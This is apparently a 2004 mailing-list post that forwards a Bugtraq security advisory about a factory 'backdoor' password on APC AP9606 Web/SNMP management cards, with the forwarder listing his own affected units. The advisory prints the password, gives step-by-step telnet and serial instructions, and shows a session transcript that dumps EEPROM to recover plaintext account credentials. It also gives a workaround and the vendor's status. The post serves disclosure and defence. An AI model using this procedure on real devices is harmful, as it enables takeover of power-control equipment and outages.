We have many products from APC and we've tested that vulnerability in some of them and ..... following are the results. The following systems are vulnerable: - Silcon DP3320E with Web/SNMP Management Card AP9606 - AOS v3.0.1 - Silcon DP340E with Web/SNMP Management Card AP9606 - AOS v3.0.1 You can't image as critical that vulnerability is for us because the two systems above are responsible for providing power to our NOC (Network Operation Center). I'm not worrying about smaller no-breaks that are responsible for providing power to ours servers, routers and switches. Regards, Thiago ----- Forwarded by thiago freitas vazquez SONDA/LIGHT on 17/02/2004 15:06 ----- Dave Tarbatt <bugtraq@always.s niffing.net> To bugtraq@securityfocus.com 16/02/2004 08:24 cc Subject APC 9606 SmartSlot Web/SNMP management card "backdoor" *** Background: APC (American Power Conversion) SmartSwitch and UPS (uninterruptible power supply) products have a Web and SNMP management card installed that permits local serial console, TELNET, web and SNMP management, monitoring and mains power control of attached devices. *** The Problem: APC SmartSlot Web/SNMP management cards have a "backdoor" password that can be abused to extract plain text username/password details for all accounts and hence gain unauthorised full control of the device. Tested vulnerable: SmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6 MasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0 *** Description: The "backdoor" password is designed for use by the factory for initial configuration of the card, e.g. MAC Address, Serial Number etc. However, it is possible to dump the contents of EEPROM which amongst other things stores the account usernames and passwords. The "backdoor" password is accepted via either the local serial port or TELNET. Use of the password on the web interface does not appear to be possible. *** To recreate (typical example): Connect a console to the serial port or TELNET to the card. At the username prompt use any username. The password is all alphabetic characters and is case sensitive: TENmanUFactOryPOWER At the selection prompt, type 13 and press return. Type the byte address of the EEPROM location to view, e.g. 1d0 and press return. Look carefully for the username and password pairs. Different firmware revisions may have the account details at different EEPROM locations. The accounts in the example below are the default accounts after their passwords have been changed. Username: apc Password: BBCCDDEEF Username: device Password: AAAABBBBB Press return to get back to the Factory Menu and press ctrl-A to logout. You can now TELNET to the card again and use the account details you've just recovered to log into and control the device. You should use the other selections with extreme care. You may cause irrepairable damage and will most certainly invalidate any warranty. The EEPROM also contains other user-configurable options in either plain text or binary encoded form. They are not detailed in this advisory. Example: [root@always root]# telnet 192.168.1.1 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. User Name : phade Password : TENmanUFactOryPOWER Factory Menu <CTRL-A> to exit 1AP9606 2WA0044004472 3G9 410/25/2000 500 C0 B7 A2 C8 2D 6v3.2.1 7A 8A 9192.168.1.1 A255.255.255.0 B192.168.1.254 C D E F G Selection> 13 Enter byte address in Hex(XXXX): 1d0 01D0 FF 50 46 61 70 63 00 FF .PFapc.. 01D8 FF FF FF FF FF FF 42 42 ......BB 01E0 43 43 44 44 45 45 46 00 CCDDEEF. 01E8 FF 64 65 76 69 63 65 00 .device. 01F0 FF FF FF FF 41 41 41 41 ....AAAA 01F8 42 42 42 42 42 00 FF 61 BBBBB..a 0200 64 6D 69 6E 20 75 73 65 dmin use 0208 72 20 70 68 72 61 73 65 r phrase 0210 00 FF FF FF FF FF FF FF ........ 0218 FF FF FF FF FF FF FF FF ........ 0220 64 65 76 69 63 65 20 75 device u 0228 73 65 72 20 70 68 72 61 ser phra 0230 73 65 00 FF FF FF FF FF se...... 0238 FF FF FF FF FF FF FF FF ........ 0240 FF 00 00 FF FF FF FF 21 .......! 0248 56 00 00 00 00 00 00 55 V......U <sp>nxt,b-bck,p-pch,other-exit *** Workaround/fix: Ensure that access to the local serial port is physically restricted and disable the TELNET interface as described in the device documentation. A patched version of the firmware which requires the management password to be entered before accessing the factory settings may be available from APC. *** Vendor status: APC were first notified six months ago on 12th August 2003 and were initially helpful in patching the problem. However, after testing a couple of beta fixes I've heard nothing for over 3 months. Dave Tarbatt, http://null.sniffing.net/ ForwardSourceID:NT0004AD92